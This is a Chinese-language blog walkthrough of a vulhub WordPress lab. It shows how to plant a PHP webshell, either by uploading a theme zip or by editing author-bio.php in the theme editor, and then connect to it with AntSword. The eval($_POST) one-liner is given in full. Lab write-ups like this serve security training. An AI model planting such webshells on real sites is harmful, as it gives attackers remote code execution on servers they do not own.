当前位置: 首页 > news >正文

vulhub-wordpress靶场

一.主题上传漏洞

来到靶场点击主题选择add new

这里有一个上传主题的地方

我们可以去网上找到wordpress主题下载一个

wordpress模板 网页设计模板 免费 免费下载 - 爱给网

下载完成后对我们有用的东西只有这一个目录,把它拖出来

点开moban目录后,创建一个php文件,写一个一句话木马

将这个目录改名为moban并且压缩

去上传

上传成功,我们去搜一下这个cms类型的绝对路径

搜索:wordpress主题上传的路径wp-content/themes/

我们去访问一下这个文件

用蚁剑连接一下

连接成功

二.编辑文件漏洞

来到主题,选择editor再选择author-bio.php

将里面的内容改为一句话木马

全部删除改为:<?php @eval($_POST['c']); ?>

改完之后记得提交

这里就是他的路径,试着访问一下,显示not found

我们把Twenty Fifteen改为twentyfifteen

发现访问到了,去用蚁剑连接一下,连接成功

http://www.lryc.cn/news/512737.html

相关文章:

  • 安装与配置
  • 斗鱼Android面试题及参考答案
  • Could not install Gradle distribution from 的解决办法
  • 基于 SensitiveWordBs 实现敏感词过滤功能
  • 网络安全威胁2024年中报告
  • 批次特征组杂记
  • 【HarmonyOS】解决自定义弹框和键盘之间安全距离的问题
  • 如何在LabVIEW中更好地使用ActiveX控件?
  • 【视觉SLAM:四、相机与图像】
  • 如何利用无线路由器实现水泵房远程监测管理
  • 使用ArcGIS Pro自带的Notebook计算多个遥感指数
  • 宝塔-firefox(Docker应用)-构建自己的Web浏览器
  • OpenCV-Python实战(8)——图像变换
  • 存储进阶笔记(二):Linux 存储栈:从 Device Mapper、LVM 到文件系统(2024)
  • Linux(Centos 7.6)基础命令/常用命令说明
  • 超详细!一文搞定PID!嵌入式STM32-PID位置环和速度环
  • 【Goland】怎么执行 go mod download
  • 服务器主机测试网络
  • 【JMeter详解】
  • Maven Wrapper 报错“未找到有效的 Maven 安装”
  • 如何通过 360 驱动大师检查自己电脑上的显卡信息
  • C++并发:线程管控
  • C++ 设计模式:策略模式(Strategy Pattern)
  • SpringBoot(Ⅱ-2)——,SpringBoot版本控制,自动装配原理补充(源码),自动导包原理补充(源码),run方法
  • 爬虫的工作原理
  • 你了解DNS吗?
  • 利用JavaScript实现顺序九宫格抽奖
  • 音视频入门知识(四):封装篇
  • 在基于IMX6ULL的Linux嵌入式编程中,与内存相关的堆(Heap)和栈(Stack)有什么区别?Linux 系统中堆和栈的内存布局是怎么样的?
  • Sealos Devbox 基础教程:使用 Cursor 从零开发一个 One API 替代品